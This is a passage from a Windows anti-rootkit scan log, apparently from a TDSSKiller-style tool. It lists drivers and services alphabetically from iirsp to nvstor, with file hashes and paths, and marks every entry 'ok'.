09:35:29.0342 0x0ff0  [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp           C:\Windows\system32\drivers\iirsp.sys
09:35:29.0351 0x0ff0  iirsp - ok
09:35:29.0440 0x0ff0  [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT          C:\Windows\System32\ikeext.dll
09:35:29.0502 0x0ff0  IKEEXT - ok
09:35:29.0563 0x0ff0  [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide        C:\Windows\system32\drivers\intelide.sys
09:35:29.0571 0x0ff0  intelide - ok
09:35:29.0590 0x0ff0  [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
09:35:29.0608 0x0ff0  intelppm - ok
09:35:29.0624 0x0ff0  [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
09:35:29.0652 0x0ff0  IPBusEnum - ok
09:35:29.0660 0x0ff0  [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
09:35:29.0683 0x0ff0  IpFilterDriver - ok
09:35:29.0743 0x0ff0  [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
09:35:29.0781 0x0ff0  iphlpsvc - ok
09:35:29.0796 0x0ff0  [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
09:35:29.0807 0x0ff0  IPMIDRV - ok
09:35:29.0815 0x0ff0  [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
09:35:29.0846 0x0ff0  IPNAT - ok
09:35:29.0856 0x0ff0  [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM          C:\Windows\system32\drivers\irenum.sys
09:35:29.0868 0x0ff0  IRENUM - ok
09:35:29.0877 0x0ff0  [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp          C:\Windows\system32\drivers\isapnp.sys
09:35:29.0886 0x0ff0  isapnp - ok
09:35:29.0927 0x0ff0  [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
09:35:29.0940 0x0ff0  iScsiPrt - ok
09:35:29.0972 0x0ff0  [ 9D946134848CC59246704DCB5FC53BB8, 6A7D371B3A7214CF00C07DA385556F7C1B8E6861C7AE2C06147DF6C6064A6CE9 ] k57nd60a        C:\Windows\system32\DRIVERS\k57nd60a.sys
09:35:29.0993 0x0ff0  k57nd60a - ok
09:35:30.0004 0x0ff0  [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
09:35:30.0012 0x0ff0  kbdclass - ok
09:35:30.0019 0x0ff0  [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
09:35:30.0035 0x0ff0  kbdhid - ok
09:35:30.0038 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso          C:\Windows\system32\lsass.exe
09:35:30.0045 0x0ff0  KeyIso - ok
09:35:30.0088 0x0ff0  [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
09:35:30.0097 0x0ff0  KSecDD - ok
09:35:30.0105 0x0ff0  [ 41774FF331F609EF442B7398EE6202B1, AD67DA06A74895C384F4A1F1CF47050DAEE9C6CE8AD12F1A116FC977B6C3A864 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
09:35:30.0116 0x0ff0  KSecPkg - ok
09:35:30.0121 0x0ff0  [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk         C:\Windows\system32\drivers\ksthunk.sys
09:35:30.0154 0x0ff0  ksthunk - ok
09:35:30.0177 0x0ff0  [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm           C:\Windows\system32\msdtckrm.dll
09:35:30.0234 0x0ff0  KtmRm - ok
09:35:30.0252 0x0ff0  [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer    C:\Windows\system32\srvsvc.dll
09:35:30.0290 0x0ff0  LanmanServer - ok
09:35:30.0315 0x0ff0  [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
09:35:30.0339 0x0ff0  LanmanWorkstation - ok
09:35:30.0357 0x0ff0  [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
09:35:30.0379 0x0ff0  lltdio - ok
09:35:30.0440 0x0ff0  [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc         C:\Windows\System32\lltdsvc.dll
09:35:30.0503 0x0ff0  lltdsvc - ok
09:35:30.0516 0x0ff0  [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts         C:\Windows\System32\lmhsvc.dll
09:35:30.0538 0x0ff0  lmhosts - ok
09:35:30.0552 0x0ff0  [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
09:35:30.0562 0x0ff0  LSI_FC - ok
09:35:30.0581 0x0ff0  [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
09:35:30.0592 0x0ff0  LSI_SAS - ok
09:35:30.0604 0x0ff0  [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
09:35:30.0613 0x0ff0  LSI_SAS2 - ok
09:35:30.0622 0x0ff0  [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
09:35:30.0632 0x0ff0  LSI_SCSI - ok
09:35:30.0644 0x0ff0  [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv           C:\Windows\system32\drivers\luafv.sys
09:35:30.0668 0x0ff0  luafv - ok
09:35:30.0737 0x0ff0  [ A401CFF74982D8DF851F20307C806073, 1D7BA90C9E77FAAE59F60AB5310EC41D9C5B98F1F9A89A3CDB9169E6DEF565DA ] LVRS64          C:\Windows\system32\DRIVERS\lvrs64.sys
09:35:30.0747 0x0ff0  LVRS64 - ok
09:35:30.0886 0x0ff0  [ 13384CB5F5813E65F31078D6ABFAAF38, A6E7374C15CAECC273197BF62F8F926BA30E9509270A8470756F4710E1DEA126 ] LVUVC64         C:\Windows\system32\DRIVERS\lvuvc64.sys
09:35:30.0962 0x0ff0  LVUVC64 - ok
09:35:31.0035 0x0ff0  [ A8D28D5B3E2A528D1EF0E338E44F2820, 40D1EFDD253BC0A0D984A5AD8A2721C3E83B15F14D538204714E6D5B00D92CEB ] MBAMProtector   C:\Windows\system32\drivers\mbam.sys
09:35:31.0043 0x0ff0  MBAMProtector - ok
09:35:31.0126 0x0ff0  [ 83C982A395D00BAFF6515FB38424EA76, 0E1B66F84A483D47550347D4A9426B95A066DB5104C4284F606A16768A11DB0C ] MBAMService     C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
09:35:31.0167 0x0ff0  MBAMService - ok
09:35:31.0180 0x0ff0  [ AE757332EA130E94E646621CC695B52A, E688CF34A4206F32B5C7301119D8459C3456FC178FA1DAA6215CE15F2C824C43 ] MBAMWebAccessControl C:\Windows\system32\drivers\mwac.sys
09:35:31.0189 0x0ff0  MBAMWebAccessControl - ok
09:35:31.0208 0x0ff0  [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
09:35:31.0223 0x0ff0  Mcx2Svc - ok
09:35:31.0229 0x0ff0  [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas         C:\Windows\system32\drivers\megasas.sys
09:35:31.0237 0x0ff0  megasas - ok
09:35:31.0258 0x0ff0  [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
09:35:31.0270 0x0ff0  MegaSR - ok
09:35:31.0303 0x0ff0  [ 43A078B4C2625A35D23F6FFE061C31C9, 8D5970140965ADCDC73EF220246142A6A3C3BA15CC82E78359AFD771CD2B28C6 ] mio             C:\Windows\system32\DRIVERS\mio.sys
09:35:31.0326 0x0ff0  mio - ok
09:35:31.0346 0x0ff0  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS           C:\Windows\system32\mmcss.dll
09:35:31.0369 0x0ff0  MMCSS - ok
09:35:31.0376 0x0ff0  [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem           C:\Windows\system32\drivers\modem.sys
09:35:31.0408 0x0ff0  Modem - ok
09:35:31.0421 0x0ff0  [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
09:35:31.0443 0x0ff0  monitor - ok
09:35:31.0461 0x0ff0  [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
09:35:31.0469 0x0ff0  mouclass - ok
09:35:31.0482 0x0ff0  [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
09:35:31.0504 0x0ff0  mouhid - ok
09:35:31.0520 0x0ff0  [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
09:35:31.0529 0x0ff0  mountmgr - ok
09:35:31.0551 0x0ff0  [ 6215DA3AD492CFBEBEE2ADBED0A6CC22, 07B290B58EF722825D50AF97E10B7098A2118B3F335E1FFF8F9E5E9AF7A0A6CE ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
09:35:31.0562 0x0ff0  MozillaMaintenance - ok
09:35:31.0614 0x0ff0  [ 6439D1E559D08BD8A1465A8943357053, 0E300508C22D12FBA3BE566B722F574CBE1B4A1A305356B92B8EA8B86267071B ] MpFilter        C:\Windows\system32\DRIVERS\MpFilter.sys
09:35:31.0627 0x0ff0  MpFilter - ok
09:35:31.0644 0x0ff0  [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio            C:\Windows\system32\drivers\mpio.sys
09:35:31.0655 0x0ff0  mpio - ok
09:35:31.0667 0x0ff0  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
09:35:31.0689 0x0ff0  mpsdrv - ok
09:35:31.0742 0x0ff0  [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc          C:\Windows\system32\mpssvc.dll
09:35:31.0780 0x0ff0  MpsSvc - ok
09:35:31.0822 0x0ff0  [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
09:35:31.0834 0x0ff0  MRxDAV - ok
09:35:31.0856 0x0ff0  [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
09:35:31.0880 0x0ff0  mrxsmb - ok
09:35:31.0904 0x0ff0  [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
09:35:31.0917 0x0ff0  mrxsmb10 - ok
09:35:31.0929 0x0ff0  [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
09:35:31.0944 0x0ff0  mrxsmb20 - ok
09:35:31.0974 0x0ff0  [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci          C:\Windows\system32\drivers\msahci.sys
09:35:31.0981 0x0ff0  msahci - ok
09:35:31.0993 0x0ff0  [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
09:35:32.0003 0x0ff0  msdsm - ok
09:35:32.0012 0x0ff0  [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC           C:\Windows\System32\msdtc.exe
09:35:32.0032 0x0ff0  MSDTC - ok
09:35:32.0048 0x0ff0  [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs            C:\Windows\system32\drivers\Msfs.sys
09:35:32.0069 0x0ff0  Msfs - ok
09:35:32.0081 0x0ff0  [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
09:35:32.0102 0x0ff0  mshidkmdf - ok
09:35:32.0108 0x0ff0  [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
09:35:32.0115 0x0ff0  msisadrv - ok
09:35:32.0128 0x0ff0  [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
09:35:32.0153 0x0ff0  MSiSCSI - ok
09:35:32.0155 0x0ff0  msiserver - ok
09:35:32.0171 0x0ff0  [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
09:35:32.0199 0x0ff0  MSKSSRV - ok
09:35:32.0256 0x0ff0  [ F0D5494D8B177C37E16966262F5D0F68, DD63427DFFD9DD2BEC8336F6AD1BEFE347012331631DC5FEC65E83B1EACDBC67 ] MsMpSvc         c:\Program Files\Microsoft Security Client\MsMpEng.exe
09:35:32.0263 0x0ff0  MsMpSvc - ok
09:35:32.0287 0x0ff0  [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
09:35:32.0309 0x0ff0  MSPCLOCK - ok
09:35:32.0329 0x0ff0  [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
09:35:32.0360 0x0ff0  MSPQM - ok
09:35:32.0373 0x0ff0  [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
09:35:32.0386 0x0ff0  MsRPC - ok
09:35:32.0390 0x0ff0  [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
09:35:32.0397 0x0ff0  mssmbios - ok
09:35:32.0405 0x0ff0  [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
09:35:32.0431 0x0ff0  MSTEE - ok
09:35:32.0440 0x0ff0  [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
09:35:32.0449 0x0ff0  MTConfig - ok
09:35:32.0458 0x0ff0  [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup             C:\Windows\system32\Drivers\mup.sys
09:35:32.0466 0x0ff0  Mup - ok
09:35:32.0492 0x0ff0  [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent        C:\Windows\system32\qagentRT.dll
09:35:32.0530 0x0ff0  napagent - ok
09:35:32.0583 0x0ff0  [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
09:35:32.0615 0x0ff0  NativeWifiP - ok
09:35:32.0650 0x0ff0  [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS            C:\Windows\system32\drivers\ndis.sys
09:35:32.0676 0x0ff0  NDIS - ok
09:35:32.0707 0x0ff0  [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
09:35:32.0729 0x0ff0  NdisCap - ok
09:35:32.0735 0x0ff0  [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
09:35:32.0756 0x0ff0  NdisTapi - ok
09:35:32.0774 0x0ff0  [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
09:35:32.0795 0x0ff0  Ndisuio - ok
09:35:32.0804 0x0ff0  [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
09:35:32.0837 0x0ff0  NdisWan - ok
09:35:32.0848 0x0ff0  [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
09:35:32.0869 0x0ff0  NDProxy - ok
09:35:32.0872 0x0ff0  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
09:35:32.0903 0x0ff0  NetBIOS - ok
09:35:32.0928 0x0ff0  [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
09:35:32.0953 0x0ff0  NetBT - ok
09:35:32.0961 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon        C:\Windows\system32\lsass.exe
09:35:32.0970 0x0ff0  Netlogon - ok
09:35:32.0995 0x0ff0  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman          C:\Windows\System32\netman.dll
09:35:33.0029 0x0ff0  Netman - ok
09:35:33.0071 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0082 0x0ff0  NetMsmqActivator - ok
09:35:33.0086 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0096 0x0ff0  NetPipeActivator - ok
09:35:33.0118 0x0ff0  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm        C:\Windows\System32\netprofm.dll
09:35:33.0158 0x0ff0  netprofm - ok
09:35:33.0164 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0173 0x0ff0  NetTcpActivator - ok
09:35:33.0177 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0186 0x0ff0  NetTcpPortSharing - ok
09:35:33.0221 0x0ff0  [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
09:35:33.0229 0x0ff0  nfrd960 - ok
09:35:33.0266 0x0ff0  [ F9EEFFC65C68A45001D1349E652B8B6F, E5F223129416083A12A85D48C65B2C8D1BF1124110399938E144308C89F9241D ] NisDrv          C:\Windows\system32\DRIVERS\NisDrvWFP.sys
09:35:33.0275 0x0ff0  NisDrv - ok
09:35:33.0331 0x0ff0  [ 9690F420A99364C1E5C439914B0DE25C, 6C6E0B27C4255001FE5F1EAD911DE1A8BF922C405B0C8031A6BD253CEB1D02A6 ] NisSrv          c:\Program Files\Microsoft Security Client\NisSrv.exe
09:35:33.0346 0x0ff0  NisSrv - ok
09:35:33.0373 0x0ff0  [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc          C:\Windows\System32\nlasvc.dll
09:35:33.0392 0x0ff0  NlaSvc - ok
09:35:33.0407 0x0ff0  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
09:35:33.0429 0x0ff0  Npfs - ok
09:35:33.0438 0x0ff0  npggsvc - ok
09:35:33.0446 0x0ff0  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi             C:\Windows\system32\nsisvc.dll
09:35:33.0475 0x0ff0  nsi - ok
09:35:33.0483 0x0ff0  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
09:35:33.0514 0x0ff0  nsiproxy - ok
09:35:33.0578 0x0ff0  [ 1A29A59A4C5BA6F8C85062A613B7E2B2, CC137F499A12C724D4166C2D85E9F447413419A0683DAC6F1A802B7F210C77F1 ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
09:35:33.0631 0x0ff0  Ntfs - ok
09:35:33.0697 0x0ff0  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null            C:\Windows\system32\drivers\Null.sys
09:35:33.0718 0x0ff0  Null - ok
09:35:33.0741 0x0ff0  [ 786DB821BFD57C0551DBBE4F75384A7D, F956D636F834F2BA5F019E187FDB9CC33940363C75A60E53CD81310A4DB6A6AB ] nusb3hub        C:\Windows\system32\drivers\nusb3hub.sys
09:35:33.0751 0x0ff0  nusb3hub - ok
09:35:33.0765 0x0ff0  [ DAA8005CAF745042BB427A1ED7433354, 3019002F174783B76D5D8AA47F7A465B7FEC7C14235B70E5C9277FE534839226 ] nusb3xhc        C:\Windows\system32\drivers\nusb3xhc.sys
09:35:33.0775 0x0ff0  nusb3xhc - ok
09:35:33.0815 0x0ff0  [ B9E5A80F646DDFEF158773722A466EA3, 028979FE600D17DA70445F44D81FAE4EDA3478FCC81FA5506133CCAC37C4E2BF ] NVHDA           C:\Windows\system32\drivers\nvhda64v.sys
09:35:33.0838 0x0ff0  NVHDA - ok
09:35:34.0141 0x0ff0  [ DF2213CF2DD81B790B85541D138D93C7, F00AC7991770C22C89C891009CFDCA3A445279235389F67B6412DBE468D70F5F ] nvlddmkm        C:\Windows\system32\DRIVERS\nvlddmkm.sys
09:35:34.0328 0x0ff0  nvlddmkm - ok
09:35:34.0508 0x0ff0  [ 72DD6225BA6055472522195F96473639, 27C8F847B247645061C0CD6DFCC986DA27638A9DFE686040160DFDCF7B3A6E72 ] NvNetworkService C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
09:35:35.0065 0x0ff0  NvNetworkService - ok
09:35:35.0095 0x0ff0  [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid          C:\Windows\system32\drivers\nvraid.sys
09:35:35.0106 0x0ff0  nvraid - ok
09:35:35.0126 0x0ff0  [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
09:35:35.0136 0x0ff0  nvstor - ok
